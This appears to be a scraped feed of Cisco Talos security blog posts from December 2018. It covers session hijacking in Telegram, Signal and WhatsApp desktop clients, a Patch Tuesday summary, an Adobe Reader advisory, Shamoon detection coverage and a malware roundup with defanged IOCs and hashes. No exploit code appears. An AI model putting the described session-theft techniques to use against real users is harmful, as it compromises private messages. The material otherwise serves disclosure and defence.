2e3431ff0a71cbf27d91acbce1e1dc80e4ca59873f451dca029aa0548a732bd3
30a2e836865ade4af8e8e35726d7187658804ae243ec4a6ef1085d27c2ea18ed
3204ba3905b38598a69f46de696b2305f5d1052bf0c42d62facd220fdd6f59e1
3d50876ea89c344ce580f8105d16077c6345a23cf8738668fb0985abf6dcd03b
3f631a8710b38c08cc4ec7098949908017023ead46db09357c0cfa00e0f88b81
42a55cc69003e563f10fc82e660da83815e969d1b40018a4687ff024f2745e56
48c247e5dc712829c5af6a481e0466eb4c92d6ba88bd21bf396a72bd1b2ef22d
50e0322b2884afb29a5d3d00b59a46ec1328accd770e877b03024eaa81d487b4
5d4af8e033d5aadba853c0c16d63b672c521a93d5c595c8efde012e3a3a24424
7d25d591fe5291003a2c43e8d479dfd06ad40c2720a9fc3ffe4b304b97678602
8bf2b7e3d0b5d4928ba715c5a7060aea26a7c0fe487853135a03bf6d02af581b
8ca568c68a48c2af33147af88da854129364ae3217832cdae95842101ca031b9
8d782fc91c991a792498e33dc2db3a2c05f3a3630d6ee0ea5a616e95a67071ca
8ddc6466bafab540c2efbb2b24492addb9e8987c0fd54676f68d15e23cbe3480
9a43186e72bde764614b092b55d4dfba00f528c5f0d45e6ccb56dcee8763a845
9aee7617f88dfffed06e6998a6cfaf8dc1f92dc2ab0164b495a4980fcb9799e1
a0ad77058d9f583cc7d4127cbeb367e4d714968336157b8ef03e6945c260dc1e
aeb657063c6507df8da52bc48126c8cfd5d0bd89113d00e4ea1e698f8fb6425f
b1c0d21bd6c8e28fdebd78dd6505135b6cca400773990a89056de054ed7cbe29
b66d3770ec1baa5f15c4665d3ca734c4613c0d6bb0e9c167de0a70b1a44f5a41

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

↧

in(Secure) messaging apps — How side-channel attacks can compromise privacy in WhatsApp, Telegram, and Signal

December 10, 2018, 8:51 am

≫ Next: Microsoft Patch Tuesday — December 2018: Vulnerability disclosures and Snort coverage

≪ Previous: Threat Roundup for Nov. 30 to Dec. 7

This blog post is authored by Vitor Ventura.

Executive summary

Messaging applications have been around since the inception of the internet. But recently, due to the increased awareness around mass surveillance in some countries, more users are installing end-to-end encrypted apps dubbed "secure instant messaging applications." These apps claim to encrypt users' messages and keep their content secure from any third parties.

However, after a deep dive into three of these secure messaging apps — Telegram, WhatsApp and Signal — we discovered that these services may not fulfill the promises they are meant to keep by putting users' confidential information at risk.

This is a serious problem, considering users download these apps in the hopes that their photos and messages will stay completely protected from third parties. These apps, which have countless users, cannot assume that their users are security educated and understand the risk of enabling certain settings on their device. As such, they have an obligation to explain the risks to users, and when possible, adopt safer defaults in their settings. In this post, we will show how an attacker could compromise these applications by performing side-channel attacks that target the operating system these apps delegated their security to. This post will dive into the methods in which these apps handle users' data. It will not include deep technical analysis of these companies' security.

Secure messaging applications

The concept behind secure messaging apps is that the content of all communication is encrypted between users without third parties involved. This means the service provider should not be able to read the content at any point.

To achieve end-to-end encryption, these applications either developed their own cryptographic protocol or adopted a third-party one. There are two main protocols these apps usually use: MT Protocol developed by the secure messaging app Telegram, and Signal Protocol, developed by the software firm Open Whisper Systems. Since MT Protocol implementation is not open-source, most of the remaining applications either use Signal Protocol or implemented a variation of it. Other applications, which are beyond the scope of this post, use this protocol upon request from the user, but not by default. That is the case of both Facebook Messenger, which utilizes a feature known as "Secret Conversations" and Google Allo, which has a feature called "Incognito" chats. In both protocols, the cryptographic implementation has been highly scrutinised by the security community. Researchers in the past have analyzed publicly available source code and performed black-box analysis in real-time communication data.

However, a secure messaging application is much more than the cryptographic protocol. There are other components, such as the UI framework, file storage model, group enrollment and mechanisms that could all be used as an attack vector. The vulnerability CVE 2018-1000136 found in the Electron framework, which is used by both WhatsApp and Signal to build their user interface, is a good example of this. This vulnerability, in a worst case scenario, could allow an attacker to execute code remotely or could be used to copy messages.

These protocols are focused on keeping communications private while in transit. However, they usually provide no assurances about security while the data is processing or when the message reaches the user's device. These protocols also don't manage group enrollment on these applications, as evidenced by the recent vulnerability found in WhatsApp. If an attacker compromises a WhatsApp server, they could add new members to a group without the group administrator's approval, allowing them to read new messages. This means there's the potential for a motivated actor to pick and choose specific WhatsApp groups to eavesdrop on, breaking the common understanding that this application provides bulletproof end-to-end encryption on all communications.

A presentation from Signal pledges to keep users' messages secure.

Source: http://www.signal.org

Behind the technical aspects of these applications is also an essential human aspect.

All of these applications advertise themselves as secure and privacy-minded. Some of them even go as far as to state that they are "safe from hacker attacks." All these statements are meant to create trust between the users and the application. Users trust that the applications will keep their private data safe.

Given that all of these applications claim to have millions of active users, it is clear that not all of these users will be cyber security-educated. As such, most of them won't have a full understanding of the risks and limitations posed by certain configurations on these applications. Keeping a person's privacy safe is more than just technology, it's also about providing the users with the correct information in a manner that they are able to understand the risks of their decisions, even without being security experts.

A Telegram advertisement states that it will keep users' messages "safe from hacker attacks."

Source: http://www.telegram.com

Another significant feature that is advertised on these apps is their multi-platform capability. All apps support the major mobile device platforms and a desktop version. The typical user will rightfully believe that the security level is the same on all platforms. All the applications' websites present the idea that the security, privacy and platforms are kept at the same level.

This signal advertisement shows users that they can use the app on various platforms

Source http://www.signal.org

Implementing security features tends to vary between these various platforms. Some platforms have more risks than others and these risks need to be communicated to the users since they will usually assume that each platform provides the same level of security protection.

The problem

The majority of these applications' users are not cybersecurity educated, which means they blindly trust these applications to keep their information safe and secure. It is clear that the source of such trust is the way the applications advertise their services.

On May 16, 2018, Talos published an article on Telegrab, a malware that can hijack sessions from Telegram. The concept is simple: If an attacker can copy the session tokens from a desktop user, then it will be able to hijack the session. The attacker won't need anything else other than the information that is stored locally. It doesn't matter if the information is encrypted or not — by copying this information, the attacker will be able to use it to create a shadow session.

Following up on that research, we decided to check if the same technique was also applicable to other messaging applications, which was proven to be correct on all tested applications (Telegram, Signal, WhatsApp). Not all of these applications handled sessions in the same way, which leads to different consequences upon this attack.

In the next section, we will describe some of these attack scenarios where the sessions of these applications can be replicated or hijacked.

Applications

Telegram — Desktop session hijacking

Telegram seems to be the application where session hijacking is most likely to happen without users having any kind of indication that the attack occurred. Messages and images that are sent or received by the victim are replicated into the attacker's session.

Dual sessions on Telegram desktop environments.

Once the attacker starts the Telegram desktop application using the stolen session information, a new session is established without giving any warning to the user. The user has to check if there is an additional session in use. This is carried out by navigating through the settings, which isn't obvious to the average user. When the message does show up on Telegram, it isn't obvious to the average user, either.

Signal — Desktop session hijacking

Signal handles the session hijacking as a race condition. When the attacker starts the application using the stolen session information, they both compete for the session. As a result, the user will see error messages on the desktop application, but not the mobile device.

Sessions created on Mac will work on Windows and vice-versa.

However, by the time the victim receives these messages, the attacker already has access to all contacts and previous chats which were not deleted.

In order to prevent the race condition, the attacker can simply delete the session information. When the user starts the application, it will receive a request to re-link the application.

For a security expert, this would be a red flag. But for the average user, they may think it's just an error in the application.

Two sessions for the same device.

When the user creates the second session, it will only be visible from the mobile device, and by default, the two sessions will have the same name.

Therefore, the attacker will have the ability to view all messages and even impersonate the victims. The messages sent by the attacker will reach the victim's legitimate devices, but the attacker can delete them while sending them, avoiding detection. If the impersonation is done using the "Disappearing messages" feature, it will be even harder for the victim to identify the imitation.

WhatsApp — Desktop session hijacking

WhatsApp is the only application that has implemented a notification mechanism if there's a second session opened on a desktop. Under normal operations, if an attacker uses the stolen session information, the victim should receive a warning like the image below.

WhatsApp multiple login notice.

This notice pops up in the application that is online when the second session is created. The second session will be live and usable until the user makes a decision. So, by the time this notice appears, the attacker already has access to all of the victim's contacts and previous messages. The attacker will also be able to impersonate the victims until there is an answer to the message box. In an attack scenario where the victim is away from the terminal, the attacker will have access until the victim is back at the terminal. The victim will have no obvious warning on the mobile device alerting them of what happened. The current notice exists every time the victim uses the desktop client. A second session won't change the warning.

This warning mechanism has a flaw, as it is possible for an attacker to bypass it following the procedure below.

The attacker can simplify the procedure by skipping step 4 and waiting before executing step 5. The result will be the same since they will have access to the same messages. The attacker will only lose access if the victim manually terminates the session on the mobile device.

This vulnerability was disclosed to Facebook according to our coordinated disclosure policy. All the advisory details can be found here.

Telegram — Mobile session shadowing

Session abuse isn't a problem just in the desktop environment. Cloned mobile applications abuse these sessions in the wild.

Shadow sessions on a mobile device.

In the mobile environment, users should not be as concerned about their session being compromised, which under normal circumstances, should be much harder to obtain. The fundamental problem lies in the fact that Telegram allows shadow sessions to coexist on the same device based on the same phone number while handling it in different applications.

This enables an attack scenario where an attacker can read all messages and contacts on Telegram until the session is terminated. With mobile devices, sessions are never terminated unless the user specifically requests termination through the options menu.

There is another scenario on the Android platform, in which a malicious application could create a shadow session without any user intervention. The malicious application only needs the "read SMS" and the "kill background process" permissions, which are not usually considered as dangerous and could easily pass Google Play store verifications.

The Telegram registration process starts by requesting a phone number, which is confirmed through an SMS that contains a unique code. If a user tries to register the same phone number again, Telegram will send a code over the Telegram channel and not an SMS.

The change in the delivery channel, from SMS to Telegram message, should prevent malicious applications from creating a shadow session without user interaction since they wouldn't be able to read the code. However, if the registration is not completed within a specific time frame, Telegram assumes the user doesn't have access to the Telegram application and will send a new code over SMS.

This backup mechanism creates a race condition that can be exploited by a malicious application, leading to a shadow session being created without user interaction. This entire process is outlined below.

From this point on, the malicious application will have access to all contacts, past and future messages which are not under the "Secret chats."

Conclusion

Secure instant messaging applications have a solid track record of protecting the information while in transit, even going as far as protecting the information from their own servers. However, they fall short when it comes to protecting application state and user information, delegating this protection to the operating system.

Signal protocol developers predicted this session hijacking. The session management protocol (Sesame protocol) security considerations contains a sub-chapter dedicated to the device compromise, which states, "Security is catastrophically compromised if an attacker learns a device's secret values, such as the identity private key and session state."

This attack vector was even predicted by the protocol developers, as such individual users and corporations should be aware that these applications are not risk free. As such, it becomes more important that companies that use these apps to transmit private and sensitive information employ endpoint technology that better protects these assets.

↧

Microsoft Patch Tuesday — December 2018: Vulnerability disclosures and Snort coverage

December 11, 2018, 10:35 am

≫ Next: Vulnerability Spotlight: Adobe Acrobat Reader DC text field remote code execution vulnerability

≪ Previous: in(Secure) messaging apps — How side-channel attacks can compromise privacy in WhatsApp, Telegram, and Signal

Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 38 vulnerabilities, nine of which are rated “critical” and 29 that are considered “important.” There are no “moderate” or “low” vulnerabilities in this release.

The advisories cover bugs in the Chakra scripting engine, several Microsoft Office products and the Microsoft Internet Explorer web browser.

For coverage of these vulnerabilities, check out our Snort blog post on this week's rule update.

Critical vulnerabilities

Microsoft disclosed nine critical vulnerabilities this month, which we will highlight below.

CVE-2018-8583, CVE-2018-8617, CVE-2018-8618, CVE-2018-8624 and CVE-2018-8629 are all memory corruption vulnerabilities in the Chakra scripting engine that could allow an attacker to execute code on the victim machine remotely. All of the bugs lie in the way the scripting engine handles objects in memory in the Microsoft Edge web browser. An attacker could exploit these vulnerabilities by tricking a user into visiting a web page using Microsoft Edge, or by tricking them into clicking on specially crafted content on other sites that accept user-created content.

CVE-2018-8540 is a remote code injection vulnerability in the Microsoft .NET framework. An attacker can exploit this flaw by passing a specific input to an application utilizing vulnerable .NET methods. If successful, the attacker could take control of an affected system.

CVE-2018-8626 is a remote code execution vulnerability that exists in Windows DNS servers when they fail to properly handle requests. An attacker could run arbitrary code on an affected system if they exploit the vulnerability by sending malicious requests to a Windows DNS server. Windows servers that are configured as DNS servers are susceptible to this vulnerability.

CVE-2018-8631 is a remote code execution vulnerability in Internet Explorer. The bug lies in the way the web browser accesses objects in memory. An attacker could exploit this bug by tricking a user into visiting a specially crafted, malicious web page in Internet Explorer. If successful, the attacker could execute arbitrary code in the context of the current user.

CVE-2018-8634 is a memory corruption vulnerability in the Microsoft Edge that exists when the web browser improperly handles objects in memory. An attacker who successfully exploits this flaw by tricking a user into visiting a malicious, specially crafted web page could gain the ability to execute arbitrary code on the machine in the context of the current user.

Important vulnerabilities

This release also contains 29 important vulnerabilities, eight of which we will highlight below.

CVE-2018-8597 and CVE-2018-8636 are remote code execution vulnerabilities in Microsoft Excel that exist when the software fails to properly handle objects in memory. An attacker can exploit these bugs by tricking the user into opening a specially crafted Excel file, either via the web or as an email attachment. If successful, the attacker could gain the ability to execute arbitrary code on the system in the context of the current user.

CVE-2018-8587 is a remote code execution vulnerability in Microsoft Outlook that exists when the software fails to properly handle objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted email attachment while using the Outlook client. If successful, the attacker could use a specially crafted file to perform actions in the security context of the current user. For example, the file could act on behalf of the logged-on user with the same permissions as the current users.

CVE-2018-8590 is a remote code execution vulnerability in Microsoft Word that exists when the software fails to properly handle objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a malicious, specially crafted Word document, either via email, the web, or another vector.

CVE-2018-8619 is a remote code execution vulnerability that exists when the Internet Explorer VBScript execution policy improperly restricts VBScript in certain scenarios. An attacker could use this vulnerability to run arbitrary code with the permissions of the current user. A user could trigger this vulnerability if they visited a specially crafted web page using Internet Explorer.

CVE-2018-8625 is a remote code execution vulnerability in the VBScript engine. The vulnerability could corrupt memory in such a way that an attacker could execute code in the context of the current user. An attacker could trigger this flaw by tricking the user into visiting a specially crafted website on Internet Explorer. Additionally, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

CVE-2018-8628 is a remote code execution vulnerability in Microsoft PowerPoint that lies in the way the software processes objects in memory. An attacker could exploit this bug by tricking the user into opening a specially crafted, malicious PowerPoint file, which would eventually grant them the ability to execute code remotely in the context of the current user. The Preview Pane is not an attack vector this vulnerability — the user must open the file in PowerPoint.

CVE-2018-8643 is a remote code execution vulnerability that exists in the scripting engine handles objects in memory in Internet Explorer. An attacker could exploit this bug by tricking a user into visiting a specially crafted web page on Internet Explorer. Additionally, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine. If successful, the attacker could then corrupt memory in such a way that they could execute arbitrary code in the context of the current users.

The other important vulnerabilities in this release are:

Coverage

In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 45142, 45143, 48509, 48510, 48513 - 48520, 48531 - 48534, 48559, 48562

↧

Vulnerability Spotlight: Adobe Acrobat Reader DC text field remote code execution vulnerability

December 11, 2018, 12:54 pm

≫ Next: Cisco Coverage for Shamoon 2 & 3

≪ Previous: Microsoft Patch Tuesday — December 2018: Vulnerability disclosures and Snort coverage

Aleksandar Nikolic of Cisco Talos discovered this vulnerability.

Executive summary

Adobe Acrobat Reader DC contains a vulnerability that could allow an attacker to remotely execute code on the victim’s machine. If the attacker tricks the user into opening a specially crafted PDF with specific JavaScript, they could cause heap corruption. The user could also trigger this bug if they open a specially crafted email attachment.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Reader DC text field value remote code execution vulnerability (TALOS-2018-0704/CVE-2018-19716)

Adobe Acrobat Reader supports embedded JavaScript in PDFs to allow for more user interaction. However, this gives the attacker the ability to precisely control memory layout, and it poses an additional attack surface. If the attacker tricks the user into opening a PDF with two specific lines of JavaScript code, it will trigger an incorrect integer size promotion, leading to heap corruption. It’s possible to corrupt the heap to the point that the attacker could arbitrarily execute code on the victim’s machine.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that Adobe Acrobat Reader DC 2019.8.20071 is impacted by this vulnerability.

Coverage

↧

Cisco Coverage for Shamoon 2 & 3

December 14, 2018, 8:30 am

≫ Next: Threat Roundup for Dec. 7 to Dec. 14

≪ Previous: Vulnerability Spotlight: Adobe Acrobat Reader DC text field remote code execution vulnerability

Update Dec. 14, 2018 10:30 CST: Added new Shamoon 3 IOCs

Shamoon is a type of destructive malware that has been previously associated with attacks against various organizations in the oil and gas industry that we've been tracking since 2012. A new variant of this threat, identified as Shamoon 2, has been used against several compromised organizations and institutions. Throughout 2017, Talos observed an increase in Shamoon 2 activity and responded to ensure our customers remained protected.

On Dec. 10, Talos observed a new Shamoon 3 variant (c3ab58b3154e5f5101ba74fccfd27a9ab445e41262cdf47e8cc3be7416a5904f) that was uploaded to VirusTotal. While it is unclear where this sample came from, it shares many of the characteristics of the Shamoon 2 variant. Talos once again responded to ensure our customers are protected with all the existing coverage mechanisms. Additionally, Talos will continue to monitor for new developments to ensure our customers remain protected.

Propagation

Shamoon 2 has been observed targeting very specific organizations and propagating within a network via network enumeration and the use of stolen credentials. Some of the credentials are organization specific from individuals or shared accounts. Other credentials are the default accounts of products used by the targeted customers.

Coverage

Coverage for Shamoon 2 is available through Cisco security products, services, and open source technologies. Note that as this threat evolves, new coverage may be developed and existing coverage adapted or modified. As a result, this post should not be considered authoritative. For the most current information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules

23893
23903
23905-23933
24127
40906

ClamAV Signatures

Win.Dropper.DistTrack-*
Win.Trojan.DistTrack.*
Win.Malware.DistTrack.*

AMP Detection

W32.GenericKD:Malwaregen.20c3.1201
W32.Malwaregen.19nb.1201
W32.47BB36CD28-95.SBX.TG
W32.Malwaregen.19nb.1201
W32.Generic:Malwaregen.20c3.1201
Win.Malware.DistTrack
W32.128FA5815C-95.SBX.TG
W32.C7FC1F9C2B-95.SBX.TG
W32.EFD2F4C3FE-95.SBX.TG
W32.010D4517C8-95.SBX.TG
Win.Malware.DistTrack.Talos

Other Mitigation Strategies

Recent Shamoon 2 activity serves as a good reminder that users and organizations need to have a comprehensive disaster recovery plan. No one can say for certain if you will be targeted by destructive malware but we can say with 100% certainty that all drives fail. Without a proper system to backup and restore your data, you risk permanently losing your data. Ensuring your assets are properly backed up and can be quickly restored is critical should a system become compromised by Shamoon, ransomware, or other destructive malware and require a complete restoration.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

IOCs

Shamoon 2

4919436d87d224f083c77228b48dadfc153ee7ad48dd7d22f0ba0d5090b5cf9b

5475f35363e2f4b70d4367554f1691f3f849fb68570be1a580f33f98e7e4df4a

01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc

c7f937375e8b21dca10ea125e644133de3afc7766a8ca4fc8376470277832d95

Shamoon 3

c3ab58b3154e5f5101ba74fccfd27a9ab445e41262cdf47e8cc3be7416a5904f

bd2097055380b96c62f39e1160d260122551fa50d1eccdc70390958af56ac003

0694bdf9f08e4f4a09d13b7b5a68c0148ceb3fcc79442f4db2aa19dd23681afe

0975eb436fb4adb9077c8e99ea6d34746807bc83a228b17d321d14dfbbe80b03

391e7b90bf3f0bfeb2c2602cc65aa6be4dd1c01374b89c4a48425f2d22fe231c

ccb1209122085bed5bded3f923835a65d3cc1071f7e4ad52bc5cf42057dd2150

dab3308ab60d0d8acb3611bf364e81b63cfb6b4c1783864ebc515297e2297589

ee084f2c6fd2cc16f613fadd712641b5742489ca87851739dc868b976867858f

36414012564b88b5a2dcded39fc5ed22301ea2ef2f455bf697fa97a5925cb721

101e74ef7a18d3a790f1d30edc7bd9f4ebf0afb2cb85cffcd5710d0a53df77a6

4d4531f0372d4364e3d9b7e6ea13abf241bbc4a4b761f8a2aea67428d0de8d83

↧

Threat Roundup for Dec. 7 to Dec. 14

December 14, 2018, 9:52 am

≫ Next: Bitcoin Bomb Scare Associated with Sextortion Scammers

≪ Previous: Cisco Coverage for Shamoon 2 & 3

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 07 and Dec. 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

Doc.Malware.Dkvn-6781497-0
Malware
This is a trojan that drops a malicious executable and executes PowerShell commands. It can be used as a downloader or a dropper for Emotet.
Txt.Malware.Nemucod-6780827-0
Malware
Nemucod is a trojan that executes ransomware on a victim's computer.
Win.Virus.Parite-6780568-0
Virus
Parite is a polymorphic file infector. It infects executable files on the local machine and network drives.
Xls.Downloader.Jums-6779285-0
Downloader
Jums is a trojan that spawns a PowerShell and creates and executes a malicious executable. It collects a large of amount of system information and reaches out to a remote server after installation.
Win.Virus.Sality-6780277-0
Virus
Sality is a file infector that establishes a peer-to-peer botnet. Although it's been prevalent for more than a decade, we continue to see new samples that require marginal attention in order to remain consistent with detection. Once a Sality client bypasses perimeter security, its goal is to execute a downloader component capable of executing additional malware.
Doc.Malware.Powload-6775735-0
Malware
Powload is a malicious document that uses PowerShell to download malware. This campaign is currently distributing the Emotet malware.
PUA.Win.Trojan.Hupigon-6776762-0
Trojan
Hupigon is a trojan that installs itself as a backdoor on a victim's machine.

Threats

Doc.Malware.Dkvn-6781497-0

Indicators of Compromise

Registry Keys

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PRINT\PRINTERS\Canon PIXMA MG2520\PrinterDriverData

Mutexes

Local\10MU_ACB10_S-1-5-5-0-57527
Local\10MU_ACBPIDS_S-1-5-5-0-57527
Local\WinSpl64To32Mutex_e162_0_3000

IP Addresses contacted by malware. Does not indicate maliciousness

45[.]40[.]183[.]1
66[.]198[.]240[.]4
103[.]18[.]109[.]178
192[.]169[.]140[.]162
209[.]151[.]241[.]184

Domain Names contacted by malware. Does not indicate maliciousness

enthos[.]net
shofar[.]com
shawktech[.]com
thecreativeshop[.]com[.]au
burlingtonadvertising[.]com

Files and or directories created

%UserProfile%\Documents\20181212
%LocalAppData%\Temp\109.exe
%SystemDrive%\~$6889120.doc
%LocalAppData%\Temp\2vuqj0ws.zbs.ps1
%LocalAppData%\Temp\4ezh4c4j.esn.psm1
%LocalAppData%\Temp\CVR95F8.tmp
%LocalAppData%\Temp\~DF78CDE2D9B1588659.TMP

File Hashes

0421be0b17b64e14118e01ec412f1721bb9079630a004ff7e846f954c2355538
18bf25020d301b1b22e316d2a6909a40c8dcea59fb04057d58346bdb58a7503c
24ee6e8bd38b5bef0c3db97c8cfdf03a38e442b624a1f7f731fb6e7c2989d6ea
2d50cc5a4ac493e5578038e8f892f9df5e134114ed6e9840089d9f32b8f28440
2ed82969c7fb23e18f1f9b0ab519124438129dc7f2530ee24604397b9c1250de
3e662508b29b2ef40092655a69073c220770a8306c0b17773059e07fe1a712b3
5ed274afe729b6b92cbb4446fa3f4f6130c8e20b3a903b13d7691d2006d2e72d
6d34270f0aeb0fbdb270e47866413a299a1deb54e7c4dd6b785a0ca7f2e0c73a
727afa31d97e874e3d2a3c11870a5b1b65ecda8905e3c97cbddb31a9fbfaf543
74201328ff459bf6412c7dbbcc0866f06f7ccc2b2dc7a1c4bc429518a85fee89
827c0012de03d21f84442e7dd0ea1d0a25f40b0e2982fab1695f935aaf471bd0
91da45beb83ea575f50ff8d9d6dcad7d9efa437b7e337006b2cc8ed2f6d4faf2
ac280877daecf65f6570233d76c249caa8eaa52cb5ba31fc3e1611d45c8d0454
aeef6e04c09d5f051f94a5c6545cf4228670954274ab97f1c85e7c78f1e6f116
af8a10416ae6e32a6250cf03d8c3ba37933903accf649e9feb4f636c17ae2b54
c26e6b57799f13d5d8353834bd721b304a15a7bbbb238995dbf98c4a26b71be3
d77fdb097fb549034a72f67236bf4c744012ff71e43f37cd89e373645fc26288
da7ac63e1a221dba1fb4d1ee743537b985fde34ad9bbc372fcc07a184ce683a7
db37c4693eebc0f518bbd7e5707ec3abd4c2633e86b2ca92b9e34b21864a310b
dd57c3ea2596874a51b13fe84d3dc328365af06bd0f50eb328819bc970766fde
de2c3b81106ab89e0dd2c7d654b0a161e2227bbaafcd1b1860c387c7b67be69d
e2ae044f486dba0d5005295ffa9100411a6225fff6c061da69225b6c50834a69
e4269fcfda0fe8ef8872dbf51aec6dc9cbb18ad4eae281700be24f563164026d
e71d9efea3a62cc265938bac1c53aa96f8729609cabfc6df4c66d5c5e9c016fe
eb2bb764fb66c7c5509c7ce50ee3e0c61a675867f85ecdae78ad547b0ac72760

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Txt.Malware.Nemucod-6780827-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses contacted by malware. Does not indicate maliciousness

144[.]217[.]147[.]190
201[.]187[.]101[.]156
185[.]104[.]28[.]132

Domain Names contacted by malware. Does not indicate maliciousness

www[.]w3[.]org
api[.]w[.]org
gmpg[.]org
ikincielesyaevi[.]com
www[.]ikincielesyaevi[.]com
www[.]gulfshorecooling[.]com
elemaroregon[.]com
gpconstructie[.]be
cvcpdx[.]com
www[.]chaffinww[.]com
workwithcore[.]com
phoenixconstruction[.]com
www[.]laneexteriorsllc[.]com
autosorno[.]cl
cleanairtx[.]com
www[.]ohiostatestucco[.]com
www[.]teknikinc[.]com
GOESTOM[.]COM
CLARAMUSICA[.]COM
claramusica[.]com
goestom[.]com

Files and or directories created

\ROUTER
\DAV RPC SERVICE
\Device\Null
\Win32Pipes.00000370.00000001
\Win32Pipes.00000370.00000002

File Hashes

029cfbcb0e44965e253979458652858b3eabfff38be5e7648c8b82f475233345
0cb706b11174c5a7fd08e70308d1ff84447d6e65a487b146846d5150931a8970
17304c0d1c57c83a58b5b1df2e6fe5b0b2a58634d1cebbd83ce8bd5533fea584
215953913e52f0e071dd8244d598a7c34367d03558599f7b9c824d916f60186a
2c93a65ec63e429b8e8a971dbaea069829763235daeb26a5f24adc69debbff71
38848aedc1194c09d6eeb88ef04ba56aee22e0f579284a63b12d896fdb0d4831
3bf5629a35700582d0abbdf8aa1c97c34c4f2fd933de6f70569d2b3103f6379e
4d85b12eddc09b1cfdfd8d580ecca6d724dd66b91d8866f707aa91cb50c7fbd7
5247f2722b8623e95f8d10cd79d0fbe3e96fe8f0527d3b9be480d2640f02b160
52cecc5d101a881b137c07143268217dacf145dab73d50e0e8da318000f5b5e0
59109d8c01b76ebe171dc28cbe37ceb393846d0ed240f54a14eb9014588c748d
5c2d33368a931651ea426f3ed037185d99c7c3bb28d5430413a2c93b4f525428
66b09b100ecc40609965a74c90e9553457d730bc8b4c5ee95b2f2089dd0aba3b
7d9fcffa70fec088cda7c4095740599a45a710ce38a66fa9e13f0dfb7bc43b3b
8afdadaa66d58e386411755871ff91858bb99016e22e67de3ce3cc63ea35c4a8
918312a6b9b634f27089520d15dc15966a25bd719627962d756f370949adb152
af0ab34d44410fab4cfb8c24dfc0240e508de5e31a0eb567c0533344eb9c92fe
de5e00e84554eb352985d85146eb696be474c1f5b97a764052fc0575fec8ad13
e29d601569f5197e631275c5391a273058ab2aca0473dedf148177516de1e7c5
f40f059bad77bf7297b3783af078e8febf11650709294e69a9c198c711a87386

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Win.Virus.Parite-6780568-0

Indicators of Compromise

Registry Keys

Mutexes

InstallLauncher_4541454E-9FFA-4246-835D-3F49EFA91F6C
\BaseNamedObjects\InstallLauncher_4541454E-9FFA-4246-835D-3F49EFA91F6C

IP Addresses contacted by malware. Does not indicate maliciousness

Domain Names contacted by malware. Does not indicate maliciousness

Files and or directories created

%LocalAppData%\Temp\ejp5C31.tmp

File Hashes

03b06a1f568e2985a763c155c14c2a9c4b7b18471d91bf2164ad44350d4353d6
0478b98235d5c49bc7facddce8f912a4ec2b58c33b4947922927e139b9efba1f
11ec64be12c389f32640d9803deffa8f93b9457572c71f36df3fe0df4e1f6a8b
17527e946bbac0ed6c69fe1b97d4d16a8d2ea20811898ee471bf0f9e4377d3e7
250e929dc833074872defd3ca65b2ccf6cf9b32ed6f6cfca07a66767e48db6d4
2a4b55983c456e9ea14115378397e67df37d89a28818cb3f557b8afbb3e086e3
2f6a2d0728cad1403d52a3dfc6db10011fa215f6f5b8272e5c4699e1a68afaf2
318722e8243edf25c73800569cc1d78c8a6f62aa382f484116c0197d3cfc6578
3858721e1297e627247f17ebf44ff0502981481af3c04ebb6c76bafda0db2c6d
3aea0bd31f0d86f9c5a5035828dea6e42cb0646c204bb866c71528bd1f714e7f
55e263c3206ceed9776d0d0b6015cc5e7c444bed6c68a66766d34998fb744ff1
5b6e1419168ecd9ead5800273b1c63fa6420455b1ac2c85be430d5e976f4a104
69528927f100ff5c7b92e6898f33e94768953fceed5ffb71fce02dc6acb9ca56
6efd875b023b1289020e7d2acd02526d61592f4dd5e1b35e2ca04eeae162507b
78af109d92ce244c02b1530f7ae65f2c9958e34e239788caf3ee94115ad36d47
8240517c639812a704d439035b22fe685b3b905bb376776c4adcc264862675e7
8e170f44cd0e49ad850ffbd244ad755d1b0b7b91051308ed18c049a5e6068acc
8f6c73d10c4c5f1ee2758f80bbee0e2700978b34ec74b83296ec9e3a403e81db
94aad46d563c9f5a46bc1e1316d638f7e96ab4ac07b7925510644768504c9d1d
9d818507ca3222b5f1f471ae1c4338de9227e95b12ac838eed1d68550019aa22
